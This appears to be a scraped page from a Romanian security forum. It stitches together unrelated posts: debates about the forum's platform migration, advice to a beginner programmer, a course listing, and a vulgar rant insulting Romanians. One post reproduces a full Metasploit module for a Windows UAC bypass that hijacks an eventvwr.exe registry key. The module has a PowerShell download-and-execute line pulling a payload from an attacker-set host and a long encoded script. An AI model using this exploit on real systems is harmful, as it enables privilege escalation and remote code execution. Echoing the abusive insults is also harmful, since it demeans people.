Leaderboard

Este un progres imens de la vBulletin la IPBoard. Nu mai eu stiu cate linii de cod am modificat in acea platforma (vB)... 1. Este cel mai mare forum de securitate, nu de web design - te inteleg daca apar probleme de securitate banale, nu daca se vede urat o tema 2. Nu esti singurul, insa sunt multe persoane care "au crescut" pe forum si care au avut de castigat (un job de exemplu) de pe urma sa, dar apoi l-au uitat (stii tu termenul - leeching) 3. S-au pierdut posturile din luna ianuarie a acestui an, atat. Si am urmarit forumul in acea perioada, crede-ma, nu s-a pierdut mare lucru 4. Sunt multi care au interes sa invete, putini capabili (ca timp) sa ii ajute 5. Moderatorii, ca si mine, au familie si job si nu mai au timp de forum 6. Profilul utilizatorului RST nu este acela, doar ca aceia ies mai mult in evidenta. Forumul nu e destinat programatorilor ci pasionatilor de securitate IT care trebuie sa aiba in sange ceva din descrierea ta. Cei care sunt programatori intra aici si deprind trasaturi non-programatorice cum ar fi "think outside the box" Pentesterii (ca si mine) isi pierd timpul pe aici. Insa sunt prea putini care au timpul si daruirea necesara de a posta materiale de calitate. Nu ai mintit, te inteles, sunt de acord cu tine (nu in totalitate). Exista posibilitatea ca acest forum sa dispara, nu neg asta, dar cat timp putem ajuta comunitatea romaneasca sa se dezvolte pe calea cea dreapta, forumul va ramane in picioare. Ma gandesc la tine ca la altii: probabil ai calitatile tehnice si psihologice necesare de a-i ajuta pe altii, dar se pare ca nu o faci. De ce? Pentru ca noua, romanilor, ne place doar sa ne plangem si vrem sa ii vedem pe altii ca fac ceva. Daca vrei o schimbare, incepe prin tine. // Nytro

Cred ca ar fi interesant sa discutam punctele tale de vedere. 1. Da-ti seama ca probleme apar si la corporatii precum Yahoo, Microsoft, Google. Inclusiv probleme de securitate grave. Asta e doar un forum. Avem familie, job si nu e timp asa berechet pentru a face ceva pe el. In plus, nu avem bani precum corporatiile mentionate anterior. 2. Esti exemplul clasic de Roman care nu isi face curat in fata portii si asteapta primaria sa vina pentru a face asta. Pune osul la munca daca vrei sa se schimbe ceva. Suntem un popor de curve, lenesi, prosti, fricosi, ciorditori si smenari. Desigur, nu ne asumam niciodata vina pentru ceva. Clasa politica e vinovata ca esti tu prost. Hahaha. 3. S-au pierdut ceva informatii de pe forum odata cu migrarea lui pe alta platforma. Asta e, am pierdut mai multe in viata cu totii. Suntem vai de pula noastra si ne-a fost furata inclusiv tara iar tu te vaiti pe o bucata de forum ca au disparut ceva posturi (cel mai probabil cu link-uri porno sau jocuri). 4. Sunt baieti aici care au 14-17 ani si stiu matematica, fizica si programare mai mult decat multi olimpici. Intre uscaturi poti gasi si oameni buni (daca stii sa-i cauti). Asta a fost si principalul motiv pentru care nu ne-am bagat pula-n el de forum. 5. Care din ei ? 6. Deci nu esti programator. Ma intreb care e profilul tau. Ti-ai facut si user nou. Generatie de barbati pizdificati.

Eu sunt unu din aia care a intrat pe forum cu 13-14 ani (acum 6-7 ani), care se ruga de bunnn sa imi faca si mie un stealer fud, care punea 12 intrebari pe ora, si cerea ajutor peste tot, care era luat la pula de vre-o 5 ori pe zi, care ii era frica de pax(cred ca asa i se zicea, ca ziceau toti ca e bulangiu atent grav cand mai tinea nemesis morala printr-un post sau pe chat, ca se vedea ca stie omu ce zice. Acelasi eu, acum ,multumita forumului, am ajuns pentester la o firma din strainatate, totul din cauza RST, HackPedia, influentelor lu epic, neme, pax, tex, bunnn, adonis si altii care nu imi mai amintesc, daca nu poate ca ajungeam lopatar, gropar sau drogalau prin parc. Asa ca profit de moment, chiar daca nu are treaba cu tema. Vroiam sa va multumesc la toti

Salutare, RST! Cautam pe internet un loc bun pentru discutiile pe partea de programare si mi-am amintit de acest forum minunat. Inainte de toate, cred ca ar fi bine sa ma prezint: Fiind vara, intre orele 11-17 este foarte-foarte cald. Neavand ce face in aceste ore, mi-am zis sa imi gasesc ceva de lucru, asa ca mi-a trecut prin cap sa incep bazele cu programarii. Neavand absolut nicio tangenta cu acest domeniu si nestiind de unde sa incep, am zis sa ma uit peste programa scolara. Am observat ca se pune mai mult accent pe algoritmica, gandire analitica, structuri de date etc., decat pe limbajele de programare. Limbajele sunt niste unelte care se schimba de multe ori, deci chiar nu conteaza cu care incep. Asadar, am ales sa incep cu....inceputul, sa imi pun bazele in acest domeniu care este in plina dezvoltare si care nu va muri niciodata, dupa parerea mea. Care sunt sfaturile voastre? Click aici pentru a afla mult mai multe lucruri despre mine care va vor putea ajuta in sfaturile voastre! Va multumesc mult atat pentru timpul acordat citirii acestui topic, ci si pentru sfaturile si recomandarile pe care mi le veti da!

Literalmente zeci de articole pe acest subiect. Parerea mea personala este in felul urmator: daca o faci din curiozitate totul este ok, pasiunea o sa vina mai tarziu ,presupun ca nici tu nu stii inca exact daca acest domeniu te atrage sau nu. Daca insa o faci pentru bani / ai auzit din mass-media/prieteni ca se castiga etc. (adica nu o faci din pasiune), tot este ok, insa vei ajunge sa ai pe la ~35 de ani par alb in cap. Intrebarile de genu: ce limbaj, ce framework ( librarii) sa folosesc, etc. nu prea isi au rostul si o sa vezi ca se starnesc polemici aproape de fiecare data. Daca ai intrebari foloseste google intai de toate, daca nu esti sigur ca raspunsurile sunt autentice sau ai gasit contra-argumente, poti sa vii aici ca sa ceri "expertiza" altora. Nu ma intelege gresit, ce am zis mai sus ti-am zis-o cu intentii bune. O sa vezi daca prinzi vechime ca devine cam iritant sa vezi acelasi subiect rascolit din mormant in fiecare luna. Prima intrebare logica pe care ai trebuii sa ti-o pui este: ce vrei sa creezi/ ce lucru anume esti curios la cum functioneaza ,etc. Restul o sa vina de la sine prin interesul personal. Mult noroc.

Nu-ți crea falsa impresie că vei învăța ceva în școală. Dacă îți place domeniul ăsta trebuie sa îți dedici timpul pentru studiu individual.

"Sec-1 Ltd partnered with AppCheck.com to undertake a research project investigating the security challenges posed by next generation web applications. The project included an investigation of Cross-Origin communication mechanisms provided via HTML5 including postMessage and CORS." Link: https://www.exploit-db.com/docs/40287.pdf

Salut, Dupa cum puteti observa, au aparut cateva probleme legate de tema. Imi bag pula in mortii si ranitii astora de la IP Board.

https://www.proxyrack.com/access/signup/vpn

Mm de labar. Jet potaie

@fusername și @tqcsu . Mulțumit bre? Youu're more paranoic than shit! Hahahahahahaahahahahahhahaaaaaaaaaaahahahahahahahhaahahaahhahahah!

Și ai fugit. Asta este munca ta. Asta ai facut pentru țara ta? Pfh!

... removed ...

Nu ai făcut nimic rău,toți mai nimerim uneori prin secțiunea greșita și moderatorii muta topicurile unde le e locul. ON: Din câte observ te atrage mai mult partea web ca sa zic asa. Dacă îți place axeaza-te pe ea, merită. Și mie îmi place, și eu cândva am încercat cu C, dar parcă ceva nu ma atrăgea îndeajuns de mult ca sa continui. Am revenit pe partea web, am început sa avansez, am început sa și câștig câte ceva din asta. Axeaza-te pe ce te atrage mai mult și nu da înapoi, fă ceea ce îți place să faci și încearcă sa fii cât mai bun în ceea ce faci. Ar fi multe de spus dar nu vreau sa o lungesc prea mult. Succes!

Multumesc pentru ajutor! Mult noroc si tie! Inteleg. Intr-adevar, este destul de iritant sa vezi acelasi subiect in cate un topic creat in fiecare luna. Eu am zis ca daca dau cat mai multe detalii si arat ceea ce stiu deocamdata legat de initierea unui drum in acest domeniu, o sa fie mai okay. Doi baieti mi-au recomandat acest forum. Initial nu am mai vrut sa folosesc vreun forum pentru informare, insa cand m-am decis sa fac un topic undeva pentru a primi ajutor, mi-am adus aminte de rstforums. Stiu ca sunt zeci de persoane care in momentul in care vor sa inceapa sa invete programare, intreaba direct cu ce limbaj si framework sa inceapa. Eu sunt constient ca in programare nu limbajele si frameworkurile conteaza cel mai mult, ci modul in care gandesti si vezi programul respectiv. Si pentru asta am nevoie de algoritmica, structuri de date si ce se mai face. Eu zic ca o sa incep bine, voi continua bine si voi termina bine atat timp cat ma mentin cum trebuie si nu dau inapoi la orice mica problema aparuta in timpul invatarii.

Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit) ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE include Post::File include Post::Windows::Priv include Post::Windows::Runas include Post::Windows::Registry include Post::Windows::Powershell def initialize(info={}) super( update_info(info, 'Name' => 'Windows Escalate UAC Protection Bypass with Fileless', 'Description' => %q{ This module will bypass Windows UAC by utilizing eventvwr.exe and hijacking entries registry on Windows. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Graeber', 'Enigma0x3', 'Pablo Gonzalez' # Port to local exploit ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/' ],['URL','http://www.elladodelmal.com/2016/08/como-ownear-windows-7-y-windows-10-con.html'], ], 'DisclosureDate'=> "Aug 15 2016" )) register_options([ OptString.new('FILE_DYNAMIC_PAYLOAD',[true,'Payload PSH Encoded will be generated here (Not include webserver path)']), OptString.new('IPHOST',[true,'IP WebServer where File Payload will be downloaded']), OptBool.new('LOCAL',[true,'File Payload is in this machine?',true] ), ]) end def check_permissions! # Check if you are an admin vprint_status('Checking admin status...') admin_group = is_in_admin_group? if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end def exploit validate_environment! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." ) when UAC_DEFAULT print_good 'UAC is set to Default' print_good 'BypassUAC can bypass this setting, continuing...' when UAC_NO_PROMPT print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead" runas_method return end keys = registry_enumkeys('HKCU\Software\Classes\mscfile\shell\open\command') if keys == nil print_good("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command not exist!") end key = registry_createkey('HKCU\Software\Classes\mscfile\shell\open\command') reg = "IEX (New-Object Net.WebClient).DownloadString(\'http://#{datastore['IPHOST']}/#{datastore['FILE_DYNAMIC_PAYLOAD']}\')" command = cmd_psh_payload(payload.encoded, 'x86',{:remove_comspec => true,:encode_final_payload => true}) if datastore['LOCAL'] if File.exists?("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}") File.delete("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}") end file_local_write("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}",command) end result = registry_setvaldata('HKCU\Software\Classes\mscfile\shell\open\command','bypass','C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C ' + reg,'REG_SZ') if result execute_script("cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcANwBiADAASABZAEIAeABKAGwAaQBVAG0ATAAyADMASwBlADMAOQBLADkAVQByAFgANABIAFMAaABDAEkAQgBnAEUAeQBUAFkAawBFAEEAUQA3AE0ARwBJAHoAZQBhAFMANwBCADEAcABSAHkATQBwAHEAeQBxAEIAeQBtAFYAVwBaAFYAMQBtAEYAawBEAE0ANwBaADIAOAA5ADkANQA3ADcANwAzADMAMwBuAHYAdgB2AGYAZQA2AE8ANQAxAE8ASgAvAGYAZgAvAHoAOQBjAFoAbQBRAEIAYgBQAGIATwBTAHQAcgBKAG4AaQBHAEEAcQBzAGcAZgBQADMANQA4AEgAegA4AGkALwBxAC8ALwArADkAZgA0ADMAWAA2AE4AKwB0AGQAWQAvAHgAcgB0AHIANQBIADkARwB1AG0AdgA4AFIAbgA5AC8ANgBOAGYANAA5AHUALwB4AHUALwAxAGEANQB6ADgARwBsAC8AOQBHAG8AOQArAGoAZAAvADMAMQAzAGoAOQBhADEAUwAvAHgAagBsADkAZQAwAFgAZgAxADcAOQBHAFQAcAArAGMALwBCAG8AbAAvAGQANwBRAGYAegBuADkALwAvAGYAOQBOAFIAYgAwADcANQBUAGEARgBQAFEANQB2AG0AOQArAGoAVABuADkATABPAG0ALwAzADUAZgBlAFgAZABIAHYAUwAvAHAAdABTAHIAOAB2ADYATAArAE0ALwBwAHAAUgBIADcALwB4AHIANQBGAFEAegB4AFgAQgBuAEgARQBMADYAWAB2AHIAMQAvAGkAYwAvAG0AcAAvAGoAZQAxAGYANAA0AHoAKwB6AGEAbgA5AFMAMgBvAGgAVQBHAHIANgA1AEoAcgBhAGIATgBOAG4ARwBmADAAKwBwADkAOQA5ADMATABkAC8AagBSAGYAMABjADAARQB0ADAAMQAvAGoANAAxADkAagBRAG0AMQBYAGkAdQBmAEgAdgA4AGEAZABYADIATQBjAGYASQBMAGUAWAAxAEQATABLADYAKwBuAEwAcgBSAG4AagBOADIAVQA0AGYAMABNAC8AYgAvAGIAUABvAGEAWgBqADgASABXAHIALwBHAFUAZgBqAHUAbgBUADkAWgBFAGkANQBaAHcAKwBKAGoAYgAvAEMAUgA5AFUAdABKAG4ATwBmAGYAbwBVADIAQwA3AEIALwBNAE4ANAA0AHkAVwBEAGYAMQBkAEUANAAyAFgAdgA4AFoARgBGAEwAcwB2AEcAWABOAGcAZwBOADcASwAvAHcAYwA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=") print_good('Created registry entries to hijack!') end r = session.sys.process.execute("cmd.exe /c c:\\windows\\system32\\eventvwr.exe",nil,{'Hidden' => true, 'Channelized' => true}) check_permissions! end def validate_environment! fail_with(Failure::None, 'Already in elevated state') if is_admin? or is_system? winver = sysinfo['OS'] unless winver =~ /Windows Vista|Windows 2008|Windows [78]/ fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.") end if is_uac_enabled? print_status 'UAC is Enabled, checking level...' else if is_in_admin_group? fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end end end Sursa: https://www.exploit-db.com/exploits/40268/

Multumesc! Mult succes si tie in planurile tale! O sa descarc arhivele. Multumesc pentru ca mi-ai zis de ele!

Salut și mult succes. De obicei în liceu se face c++ Ai în secțiunea "tutoriale" 2 arhive cu bazele, prima arhiva e suficienta pentru liceu, cel puțin eu aia am făcut în 4 ani.

Simplu. Pe celălalt nu ai atașat un email alternativ.

Sunt singurul care si pe platforma veche si pe asta noua a ales tema alba?

Phhh, eu citesc forumul noaptea cu ochelarii de soare pe nas.

Eu nu ma pot obisnuii cu tema pe alb...de cand stiu rst-ul a avut si nuante mai "dark"

Starts on August 30, 2016 - Te poti inscrie aici: https://www.edx.org/course/introduction-computer-science-mitx-6-00-1x-8#! Length: 9 weeks Effort: 15 hours per week Price: Free Institution: MITx Subject: Computer Science Level: Introductory Languages: English Video Transcripts: English Prerequisites High school algebra and a reasonable aptitude for mathematics. Students without prior programming background will find there is a steep learning curve and may have to put in more than the estimated time effort. What you'll learn A Notion of computation The Python programming language Some simple algorithms Testing and debugging An informal introduction to algorithmic complexity Data structures Since these courses may be the only formal computer science courses many of the students take, we have chosen to focus on breadth rather than depth. The goal is to provide students with a brief introduction to many topics so they will have an idea of what is possible when they need to think about how to use computation to accomplish some goal later in their career. That said, they are not "computation appreciation" courses. They are challenging and rigorous courses in which the students spend a lot of time and effort learning to bend the computer to their will.

sunt dispus si eu sa platesc pentru postari pe pagini ro